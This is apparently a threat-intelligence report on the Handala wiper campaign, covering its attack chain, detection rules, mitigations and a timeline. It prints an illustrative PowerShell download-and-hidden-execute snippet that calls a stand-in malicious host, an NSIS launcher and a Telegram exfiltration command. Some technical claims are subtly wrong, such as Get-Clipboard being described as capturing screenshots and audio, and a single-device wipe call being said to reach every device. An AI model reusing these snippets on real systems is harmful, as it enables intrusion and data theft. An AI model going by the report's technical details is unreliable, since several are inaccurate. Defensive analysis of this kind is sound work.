Handala Hack: Unveiling the Modus Operandi of a State‑Backed Wiper

Executive Summary

The Handala Hack, also known as Void Manticore or Storm‑0842, is a sophisticated, state‑backed cyber‑campaign originating from Iran. Using a multi‑stage malware chain that masquerades as legitimate software, the group leverages Microsoft Intune administrative privileges to issue remote wipe commands, while exfiltrating data via AWS S3 and Storj buckets. The attack on Stryker Corp. on 11 March 2026, which wiped more than 200 000 devices and exfiltrated ~50 TB of data, demonstrates the destructive potential of this threat. Immediate actions include tightening Intune admin controls, enforcing MFA, blocking Telegram C2 traffic, and deploying EDR solutions that detect PowerShell‑based persistence and file‑deletion activity.

Technical Analysis

1. Root Cause and Vulnerability Mechanics

The Handala attack does not hinge on a single software flaw but exploits a combination of privileged access, misconfigurations, and malicious code design:

Component Root Cause Impact
Microsoft Intune Admin Rights Lack of least‑privilege enforcement and absence of MFA on admin accounts Enables attackers to issue a global remote‑wipe command
PowerShell Execution The first‑stage payload invokes PowerShell scripts that exclude critical directories and hide execution traces Bypasses basic AV and EDR detection
Extension‑less NSIS Installers Malicious installers omit the .exe extension, evading proxy and file‑type signature checks Allows the installer to be downloaded and executed without raising alerts
Telegram C2 Channels Telegram’s end‑to‑end encryption and widespread use make it a low‑visibility C2 medium Provides a resilient command channel that is hard to block without collateral damage

The combination of these factors creates a logic flaw in the overall attack chain: the malware assumes that an Intune admin will trust the device’s local configuration and that the device will accept a remote wipe command without additional verification.

2. Step‑by‑Step Exploitation Chain

  1. Initial Access – Phishing / Social Engineering

    • Victims receive an email or message that appears to be from a trusted source (e.g., a tech support or a popular messaging app).
    • The attachment or link contains a malicious installer disguised as Pictory, KeePass, WhatsApp, or Telegram.
    • The installer is an extension‑less NSIS binary that bypasses standard file‑type checks.

  2. Execution – PowerShell Payload

    • The installer launches a PowerShell script (Invoke-Expression) that performs the following:
      • Excludes system directories (C:\Windows, C:\Program Files) from scanning.
      • Loads a secondary payload from a remote URL.
      • Hides execution by setting the Hidden property and clearing console output.



        # Sample PowerShell execution (illustrative)

        
$url = "https://malicious.example.com/secondstage.ps1"

        
Invoke-WebRequest -Uri $url -OutFile "$env:TEMP\secondstage.ps1"

        
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File $env:TEMP\secondstage.ps1" -WindowStyle Hidden


  3. Persistence – Telegram Bot C2

    • The second‑stage payload establishes a TCP/HTTPS connection to a Telegram bot API endpoint.
    • Commands are received via JSON payloads, enabling the attacker to instruct the malware to:
      • Capture screenshots and audio (Get-Clipboard, Get-WmiObject -Class Win32_SoundDevice).
      • Enumerate files and directories (Get-ChildItem).
      • Compress data (Compress-Archive).
      • Delete files (Remove-Item with -Recurse).

  4. Privilege Escalation – Intune Remote Wipe

    • The malware authenticates to Azure AD using compromised Intune admin credentials or stolen tokens.
    • It issues a deviceManagement/managedDevices/{id}/wipe API call, which triggers a remote wipe on all enrolled devices.
    • The wipe command is broadcast to every device in the tenant, regardless of user consent.

  5. Exfiltration – Cloud Storage

    • Compressed data is uploaded to pre‑configured AWS S3 and Storj buckets.
    • The upload is performed via signed URLs or SDK calls, often using minimal headers to avoid detection.

  6. Defacement – Entra Login Page

    • Before or during the wipe, the malware modifies the Microsoft Entra (Azure AD) login page, replacing the default logo with the Handala symbol.
    • This serves both as a psychological weapon and a confirmation of successful compromise.

  7. Destruction – Data Erasure

    • The Intune wipe command permanently erases data on Windows laptops, mobile devices, and servers.
    • The malware also performs local file deletion to reduce forensic footprints.

3. Code and Payload Examples

While no public samples were released, the following snippets illustrate the techniques reported by Check Point Research and the FBI:

Extension‑less NSIS Installer (Illustrative)

; NSIS script without .exe extension
OutFile "malicious"
InstallDir "$TEMP"
Section
    ExecShell "open" "powershell.exe" "-NoProfile -ExecutionPolicy Bypass -File $TEMP\secondstage.ps1"
SectionEnd

Telegram Bot Command Payload

{
  "command": "exfiltrate",
  "parameters": {
    "target": "C:\\Users\\*\\Documents",
    "bucket": "s3://handala-exfil"
  }
}

Impact Assessment

Metric Value
Systems Wiped >200 000 devices (Windows laptops, mobile devices, servers)
Data Exfiltrated ~50 TB
Geographic Reach 79 countries (Stryker’s operations)
Primary Target Technology, IT, government, defense, critical infrastructure, energy, education, finance
Notable Incident Stryker Corp. global wipe on 11 March 2026

The Handala attack is comparable to the Wiper campaigns of 2017 (e.g., Wiper used by the Lazarus Group) in terms of destructive intent, but it uniquely leverages cloud‑native management platforms (Intune) and modern messaging apps (Telegram) for C2. The use of AWS S3 and Storj for exfiltration mirrors the Spearphishing Attachment technique used by the Cobalt Group in 2024, but the scale of data loss is unprecedented for a single operation.

Detection & Response

Indicator Source Detection Method
PowerShell execution with hidden window Windows Event ID 4104 (PowerShell) EDR rule for -WindowStyle Hidden
Unusual Intune wipe requests Azure AD audit logs Alert on deviceManagement/managedDevices/{id}/wipe
Outbound traffic to Telegram domains DNS logs Block or flag t.me, api.telegram.org
Upload to AWS S3/Storj buckets CloudTrail, S3 access logs Flag large multipart uploads from internal IPs
Defacement of Entra login page Web server logs Alert on changes to /login assets
File deletion patterns EDR file‑system monitoring Alert on mass Remove-Item operations

YARA Rule Example (PowerShell Detection)

rule PowerShell_Hidden_Execution
{
    meta:
        description = "Detects PowerShell launched with Hidden window style"
    strings:
        $hidden = /-WindowStyle Hidden/
    condition:
        $hidden
}

Mitigation & Remediation

  1. Restrict Intune Admin Privileges

    • Enforce least‑privilege: limit the number of accounts with Global Administrator or Intune Administrator roles.
    • Require MFA for all privileged accounts.
    • Audit Intune wipe logs; set alerts for mass wipe events.

  2. Secure PowerShell

    • Enable PowerShell logging (Set-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\PowerShell\EnableScriptBlockLogging -Type DWord -Value 1).
    • Deploy EDR solutions that flag hidden PowerShell processes and directory exclusion patterns.

  3. Block Telegram C2 Traffic

    • Use outbound filtering to block api.telegram.org and t.me domains.
    • Implement a web proxy that inspects HTTPS traffic for Telegram bot API calls.

  4. Monitor Cloud Exfiltration

    • Deploy CASB to monitor AWS S3 and Storj bucket activity.
    • Enforce data loss prevention (DLP) policies on large file uploads.

  5. Defacement Prevention

    • Harden Azure AD login pages: enable custom branding only through approved channels.
    • Use web application firewalls (WAF) to detect unauthorized changes to login assets.

  6. Incident Response Playbook

    • Immediately isolate affected devices.
    • Verify Intune wipe commands in Azure AD logs.
    • Conduct forensic imaging before wiping to preserve evidence.
    • Coordinate with Microsoft Support for recovery of Intune configurations.

Timeline

Date Event
Mid‑2022 Homeland Justice persona established for multiple attacks
July 2024 Wiper campaign hashes released
September 2024 Seyed Yahya Hosseini Panjaki sanctioned by U.S. Treasury
Late 2025 Expansion to U.S., Gulf states, and Western institutions
January 2026 Iranian internet blackout; Starlink IP ranges observed
28 Feb 2026 U.S.–Israeli Operation Epic Fury strikes; escalation of Handala activity
11 Mar 2026 Stryker Corporation suffers global wipe and data exfiltration

Sources & References

  1. Check Point Research. “Handala Hack – Unveiling Group’s Modus Operandi.” 2026. https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/
  2. Marc‑Frederic Gomez. “INTELLIGENCE REPORT — HANDALA / HANDALA HACK TEAM.” 2026. https://blog.marcfredericgomez.com/intelligence-report-handala-handala-hack-team/
  3. Infosecurity Magazine. “Handala Group Tied to Iranian Hack‑and‑Leak Operations, FBI Reveals.” 2026. https://www.infosecurity-magazine.com/news/handala-group-iranian-hack-and/
  4. The Cyber Express. “Who Is Handala – The Iran‑Linked Ghost Group That Just Wiped 200K Systems.” 2026. https://thecyberexpress.com/who-is-handala-hackers-in-stryker-cyberattack/

Sources

  1. “Handala Hack” – Unveiling Group’s Modus Operandi
  2. INTELLIGENCE REPORT — HANDALA / HANDALA HACK TEAM –
  3. Handala Group Tied to Iranian Hack‑and‑Leak Operations, FBI Reveals
  4. Who Is Handala — The Iran-Linked Ghost Group That Just Wiped 200K ...